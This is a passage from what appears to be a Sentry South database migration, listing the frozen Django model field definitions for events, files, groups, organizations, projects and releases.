}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {
'unique_together':
"(('project', 'ident'), ('project', 'hash'))",
'object_name':
'EventUser',
'index_together':
"(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'username':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
})
},
'sentry.file': {
'Meta': {
'object_name': 'File'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'legacy_blob'",
'null': 'True',
'to': "orm['sentry.FileBlob']"
}
),
'blobs': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.FileBlob']",
'through': "orm['sentry.FileBlobIndex']",
'symmetrical': 'False'
}
),
'checksum':
('django.db.models.fields.CharField', [], {
'max_length': '40',
'null': 'True'
}),
'headers': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'type': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.fileblob': {
'Meta': {
'object_name': 'FileBlob'
},
'checksum':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
)
},
'sentry.fileblobindex': {
'Meta': {
'unique_together': "(('file', 'blob', 'offset'),)",
'object_name': 'FileBlobIndex'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.FileBlob']"
}
),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.globaldsymfile': {
'Meta': {
'object_name': 'GlobalDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'uuid':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '36'
})
},
'sentry.group': {
'Meta': {
'unique_together': "(('project', 'short_id'),)",
'object_name': 'Group',
'db_table': "'sentry_groupedmessage'",
'index_together': "(('project', 'first_release'),)"
},
'active_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'culprit': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'null': 'True',
'db_column': "'view'",
'blank': 'True'
}
),
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']",
'null': 'True',
'on_delete': 'models.PROTECT'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_public': (
'django.db.models.fields.NullBooleanField', [], {
'default': 'False',
'null': 'True',
'blank': 'True'
}
),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'level': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '40',
'db_index': 'True',
'blank': 'True'
}
),
'logger': (
'django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64',
'db_index': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'null': 'True'
}
),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'resolved_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'short_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'time_spent_count':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'time_spent_total':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'times_seen': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '1',
'db_index': 'True'
}
)
},
'sentry.groupassignee': {
'Meta': {
'object_name': 'GroupAssignee',
'db_table': "'sentry_groupasignee'"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'unique': 'True',
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_assignee_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupbookmark': {
'Meta': {
'unique_together': "(('project', 'user', 'group'),)",
'object_name': 'GroupBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_bookmark_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupemailthread': {
'Meta': {
'unique_together': "(('email', 'group'), ('email', 'msgid'))",
'object_name': 'GroupEmailThread'
},
'date': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'msgid': ('django.db.models.fields.CharField', [], {
'max_length': '100'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Project']"
}
)
},
'sentry.grouphash': {
'Meta': {
'unique_together': "(('project', 'hash'),)",
'object_name': 'GroupHash'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
)
},
'sentry.groupmeta': {
'Meta': {
'unique_together': "(('group', 'key'),)",
'object_name': 'GroupMeta'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {
'object_name': 'GroupRedirect'
},
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'previous_group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'unique': 'True'
})
},
'sentry.grouprelease': {
'Meta': {
'unique_together': "(('group_id', 'release_id', 'environment'),)",
'object_name': 'GroupRelease'
},
'environment':
('django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64'
}),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.groupresolution': {
'Meta': {
'object_name': 'GroupResolution'
},
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouprulestatus': {
'Meta': {
'unique_together': "(('rule', 'group'),)",
'object_name': 'GroupRuleStatus'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_active': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'rule': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Rule']"
}
),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
})
},
'sentry.groupseen': {
'Meta': {
'unique_together': "(('user', 'group'),)",
'object_name': 'GroupSeen'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'db_index': 'False'
}
)
},
'sentry.groupsnooze': {
'Meta': {
'object_name': 'GroupSnooze'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'until': ('django.db.models.fields.DateTimeField', [], {})
},
'sentry.groupsubscription': {
'Meta': {
'unique_together': "(('group', 'user'),)",
'object_name': 'GroupSubscription'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Project']"
}
),
'reason':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.grouptagkey': {
'Meta': {
'unique_together': "(('project', 'group', 'key'),)",
'object_name': 'GroupTagKey'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouptagvalue': {
'Meta': {
'unique_together': "(('group', 'key', 'value'),)",
'object_name': 'GroupTagValue',
'db_table': "'sentry_messagefiltervalue'",
'index_together': "(('project', 'key', 'value'),)"
},
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'null': 'True',
'to': "orm['sentry.Project']"
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.lostpasswordhash': {
'Meta': {
'object_name': 'LostPasswordHash'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'unique': 'True'
}
)
},
'sentry.option': {
'Meta': {
'object_name': 'Option'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'last_updated':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {
'object_name': 'Organization'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'members': (
'django.db.models.fields.related.ManyToManyField', [], {
'related_name': "'org_memberships'",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMember']",
'to': "orm['sentry.User']"
}
),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'slug':
('django.db.models.fields.SlugField', [], {
'unique': 'True',
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.organizationaccessrequest': {
'Meta': {
'unique_together': "(('team', 'member'),)",
'object_name': 'OrganizationAccessRequest'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'member': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationmember': {
'Meta': {
'unique_together': "(('organization', 'user'), ('organization', 'email'))",
'object_name': 'OrganizationMember'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': (
'django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'member_set'",
'to': "orm['sentry.Organization']"
}
),
'role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMemberTeam']",
'blank': 'True'
}
),
'token': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'unique': 'True',
'null': 'True',
'blank': 'True'
}
),
'type': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'sentry_orgmember_set'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.organizationmemberteam': {
'Meta': {
'unique_together': "(('team', 'organizationmember'),)",
'object_name': 'OrganizationMemberTeam',
'db_table': "'sentry_organizationmember_teams'"
},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'organizationmember': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationonboardingtask': {
'Meta': {
'unique_together': "(('organization', 'task'),)",
'object_name': 'OrganizationOnboardingTask'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_completed':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.organizationoption': {
'Meta': {
'unique_together': "(('organization', 'key'),)",
'object_name': 'OrganizationOption',
'db_table': "'sentry_organizationoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.project': {
'Meta': {
'unique_together': "(('team', 'slug'), ('organization', 'slug'))",
'object_name': 'Project'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'first_event': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'forced_color': (
'django.db.models.fields.CharField', [], {
'max_length': '6',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'public': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50',
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.projectbookmark': {
'Meta': {
'unique_together': "(('project_id', 'user'),)",
'object_name': 'ProjectBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.projectdsymfile': {
'Meta': {
'unique_together': "(('project', 'uuid'),)",
'object_name': 'ProjectDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'uuid': ('django.db.models.fields.CharField', [], {
'max_length': '36'
})
},
'sentry.projectkey': {
'Meta': {
'object_name': 'ProjectKey'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Project']"
}
),
'public_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'roles': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'secret_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.projectoption': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'ProjectOption',
'db_table': "'sentry_projectoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.projectplatform': {
'Meta': {
'unique_together': "(('project_id', 'platform'),)",
'object_name': 'ProjectPlatform'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'platform': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.release': {
'Meta': {
'unique_together': "(('project', 'version'),)",
'object_name': 'Release'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_released':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'date_started':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'new_groups':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'owner': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'ref': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'url': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'version': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.releasecommit': {
'Meta': {
'unique_together': "(('release', 'commit'), ('release', 'order'))",
'object_name': 'ReleaseCommit'
},
'commit': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Commit']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.releaseenvironment': {
'Meta': {
'unique_together': "(('project_id', 'release_id', 'environment_id'),)",
'object_name': 'ReleaseEnvironment',
'db_table': "'sentry_environmentrelease'"
},
'environment_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.releasefile': {
'Meta': {
'unique_together': "(('release', 'ident'),)",
'object_name': 'ReleaseFile'
},
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.repository': {
'Meta': {
'unique_together': "(('organization_id', 'name'),)",
'object_name': 'Repository'
},
'date_added':
